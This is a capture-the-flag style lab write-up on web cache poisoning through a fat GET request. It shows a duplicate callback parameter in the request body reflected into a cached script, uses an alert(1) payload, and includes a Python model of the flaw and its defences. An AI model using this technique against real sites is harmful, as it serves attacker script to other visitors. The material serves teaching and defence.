Web cache poisoning via a fat GET request
Description
This lab is vulnerable to web cache poisoning. It accepts GET requests that have a body, but does not include the body in the cache key. A user regularly visits this site’s home page using Chrome.
Reproduction
Every page imports the script /js/geolocate.js, which executes the callback function setCountryCookie(). Send the request GET /js/geolocate.js?callback=setCountryCookie to Burp Repeater. It is possible to control the name of the function that is called in the response by passing in a duplicate callback parameter via the request body. The cache key is still derived from the original callback parameter in the request line:
Request:
GET /js/geolocate.js?callback=setCountryCookie
…
callback=arbitraryFunction
Response:
HTTP/1.1 200 OK
X-Cache-Key: /js/geolocate.js?callback=setCountryCookie
…
arbitraryFunction({"country" : "United Kingdom"})
Send the request again, but this time pass in alert(1) as the callback function. Check that you can successfully poison the cache. Remove any cache busters and re-poison the cache. The lab will solve when the victim user visits any page containing this resource import URL.
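The following is an added, constructed model of the cache-key mistake described above; it is not the lab's or PortSwigger's code. The `origin`, `Cache` and `victim_sees` names are assumptions. It shows why a key built only from the request line lets a fat GET poison what the victim receives, and what two defensive cache configurations (keying on the body, or refusing GET bodies) change.

```python
from urllib.parse import parse_qs, urlparse

# Constructed model of the lab's origin server (assumption): `callback` is read
# from the query string, but a duplicate parameter in the body overrides it.
def origin(target: str, body: str = "") -> str:
    params = {k: v[-1] for k, v in parse_qs(urlparse(target).query).items()}
    params.update({k: v[-1] for k, v in parse_qs(body).items()})
    callback = params.get("callback", "setCountryCookie")
    return f'{callback}({{"country" : "United Kingdom"}})'


class Cache:
    """Toy shared cache. `include_body` decides whether a GET body is part of
    the cache key; `reject_get_body` refuses fat GET requests outright."""

    def __init__(self, include_body: bool = False, reject_get_body: bool = False):
        self.store = {}
        self.include_body = include_body
        self.reject_get_body = reject_get_body

    def fetch(self, target: str, body: str = "") -> str:
        if body and self.reject_get_body:
            return "400 Bad Request: GET with body refused"
        # Vulnerable default: the key is the request line only (like X-Cache-Key).
        key = (target, body if self.include_body else "")
        if key not in self.store:
            self.store[key] = origin(target, body)
        return self.store[key]


def victim_sees(cache: Cache) -> str:
    """A fat GET with a duplicate callback is sent first; then the victim
    requests the normal import URL. Return the script body the victim gets."""
    target = "/js/geolocate.js?callback=setCountryCookie"
    cache.fetch(target, body="callback=arbitraryFunction")  # poisoning attempt
    return cache.fetch(target)                               # victim's request


if __name__ == "__main__":
    print("request-line key only:", victim_sees(Cache()))
    print("body included in key :", victim_sees(Cache(include_body=True)))
    print("GET body rejected    :", victim_sees(Cache(reject_get_body=True)))
```

Only the first configuration serves `arbitraryFunction(...)` to the victim; either defensive setting leaves the cached response as `setCountryCookie(...)`.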
PoC
Exploitability
An attacker will need to poison the cache with a response that executes alert(1) in the victim’s browser using a fat GET request.